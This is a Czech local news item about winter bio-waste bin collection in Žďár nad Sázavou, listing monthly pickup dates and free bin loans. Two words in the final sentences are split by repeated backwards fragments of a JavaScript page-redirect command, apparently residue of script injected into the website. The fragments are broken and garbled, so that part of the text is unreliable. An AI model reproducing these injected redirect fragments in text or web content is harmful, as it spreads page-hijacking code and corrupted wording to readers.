Rainbow page separator

Biopopelnice se budou v zimě vyvážet jen jednou za měsíc

Středa, 6. ledna 2016

Třídění odpadu

Žďár nad Sázavou / Pouze jedenkrát měsíčně budou v zimě ve Žďáře vyváženy biopopelnice. Termíny svozů jsou stanoveny na 12. ledna, 16. února a 15. března – vždy se jedná o úterý. Od dubna pak budou nádoby na bioodpad rozmístěné po městě vyprazdňovány pravidelně každý týden.
I v současné době stále ještě mohou obyvatelé v případě zájmu požádat městský úřad o zapůjčení popelnice na bioodpad, žďárská radnice pro le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní rok plánuje další rozšíření jejich množství. Výpůjčka popelnice je bezplatná a zajímat se o ni mohou jak majitelé rodinných domků ve Žďáře, tak i zástupci by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových domů.